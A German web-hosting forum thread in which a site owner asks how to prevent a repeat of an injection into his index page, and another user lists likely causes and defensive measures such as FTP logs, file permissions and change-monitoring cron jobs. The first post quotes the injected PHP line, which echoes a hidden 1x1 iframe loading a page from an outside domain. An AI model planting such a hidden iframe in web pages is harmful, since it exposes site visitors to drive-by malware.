Ergebnis 1 bis 3 von 3

Thema: Wie kann man folgendes verhindern...

  1. #1
    Erfahrener Benutzer Avatar von SilentRunner
    Registriert seit
    18.08.2006
    Beiträge
    1.076

    Wie kann man folgendes verhindern...

    Hallo Gemeinde,

    ich habe heute morgen schön blöd geschaut, meine Seite war nicht zu erreichen.
    Fehlermeldung war irgendwwas mit encodierung fehlgeschlagen.

    in meiner index war folgendes eingeschleust worden:

    PHP-Code:
    <?php echo "<iframe src=\"http://herofreemanja.com/img1/count.htm\" width=\"1\" height=\"1\" frameborder=\"0\"></iframe>" ?><?
    meine Frage.....wie kann man so eine einschleusung verhindern?

    Nach dem Übeltäter brauch ich garnicht erst zu fragen, ich denke mir das ist der gleiche, der ewig hackt und manipuliert......(ri....)

    Kann mir da jemand einen Rat geben?

    Gruß
    Silent

  2. #2
    Erfahrener Benutzer Avatar von jpwfour
    Registriert seit
    06.02.2008
    Beiträge
    3.717
    Ohne genau zu wissen, wie es dahinkommt, kann man natürlich keine konkrete Maßnahme nennen.

    Einige Möglichkeiten:
    1. Schadsoftware auf dem PC des Webmasters, dadurch Modifikation bei der FTP Übertragung, Auslesen von Passwörtern uvm.
    2. Schwache Passwörter (sollte allerdings klar sein...)
    3. Sicherheitslücken in der Serversoftware (als Webspace-Kunde kann man da nix machen, und der Hoster wird das zu 99% sowieso ungeprüft kategorisch abstreiten ^^) oder Fehlkonfiguration, im Falle von vServer/root-Zugang bitte alles genauestens prüfen (dann sollte man auch rausfinden, wie der Code da reinkam und von welcher IP, siehe FTP-Logs, kann man als WebspaceKunde häufig auch erhalten vom Hoster!)
    4. Sicherheitslücken in den Skripten, dadurch Einschleusung des Codes

    Grob nach deiner Aussage denke ich kann man sagen, hattest du evtl. noch Glück, weil das eher nach einem Bot aussieht, daher der "fehlerhafte" Einbau. Wenn ein Mensch den Zugriff gehabt hätte, hätte er vermutlich das ganze korrekt eingebaut und auch mehr zu verschleiern versucht. Durchsuch mal alle index.php Dateien, ob sich überall der Code findet?

    Der Nachteil daran ist, dass das Gesamtsystem irgendwo anfällig war/ist für eine häufig vorhandene Sicherheitslücke, die sich auch automatisiert ausnutzen lässt.
    Daher den Hoster auf jeden Fall mal darüber informieren, der wird zwar meist sagen, er hat damit nix zu tun und alles ist sicher etc. aber wenn sich die Meldungen häufen, denke ich schauen die dann doch mal nach

    Da ich selbst auch etwas paranoid bin, was das angeht, lass ich regelmäßig ein Cron laufen, der die Änderungszeiten und Erstellungszeiten aller ausführbaren Dateien prüft und diese mit dem letzten Login von meiner IP aufn FTP vergleicht. Klar könnte ein Hacker dieses Skript evtl. ausfindig machen und manipulieren, dazu müsste er aber schon ganz schön rumwühlen, soviel Zeit nimmt sich meist wohl kein Mensch, und die Bots können das eh nicht. Das schafft keine Sicherheit, aber schnelle Benachrichtigung, wenn was nicht stimmt.

    Auf dem einen Webspace, den ich verwalte (Rest habe ich root und damit mehr Möglichkeiten), habe ich Zugriff auf die FTP-Logs, und kann den .php Dateien das Schreibrecht nehmen, sodass durch eine Sicherheitslücke im PHP Skript keine vorhandene Datei beschrieben/geändert werden kann. Allerdings muss dazu der Benutzer, unter dem PHP ausgeführt wird, ein anderer sein, als der dem die Datei gehört (gruppe etc spielen da auch noch eine Rolle, vermute das ist so bei den wenigsten Hostern möglich).

    Nächste Frage wäre dann, hast du einen Webspace oder root Zugriff, bei welchem Hoster, welche Software ist im Einsatz, welche Skripte/Addons usw.
    Kill one man, and you are a murderer.
    Kill millions of men, and you are a conqueror.
    Kill them all, and you are a god.
    - Jean Rostand, Thoughts of a Biologist (1939)

  3. #3
    Erfahrener Benutzer Avatar von SilentRunner
    Registriert seit
    18.08.2006
    Beiträge
    1.076
    ich benutze das vms1.2.x

    der code war nur in der index datei, alle anderen datein sind verschont geblieben.

    es hat ja nur zum scheitern des aufrufes meiner domain geführt, mehr gott sei dank nicht

    aber ich werde mal mit meinem hoster reden, obs da unerlaubte zugriffe gab.

    ich denke mal, wenns einen einmal erwischt hat, wird derjenige mit dem schadstoff immer wieder kommen, nur so aus spaß.

Ähnliche Themen

  1. 0 Sek Banner verhindern
    Von eselfutter im Forum [HD] Programmieren
    Antworten: 9
    Letzter Beitrag: 13.08.2010, 03:14
  2. Direktaufruf der include Dateien verhindern
    Von auron2008 im Forum [HD] Programmieren
    Antworten: 5
    Letzter Beitrag: 22.07.2010, 06:25
  3. Fehlerunterdrückung verhindern
    Von twofive im Forum [HD] Programmieren
    Antworten: 5
    Letzter Beitrag: 13.05.2008, 16:23
  4. Wie html im Nicknamen verhindern?
    Von Rallef im Forum Support zu Addons & Erweiterungen
    Antworten: 11
    Letzter Beitrag: 05.04.2008, 19:45
  5. Eigenen Bettelaufruf verhindern
    Von kleinerengel im Forum [HD] Codeschnippsel
    Antworten: 13
    Letzter Beitrag: 22.08.2007, 15:56

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •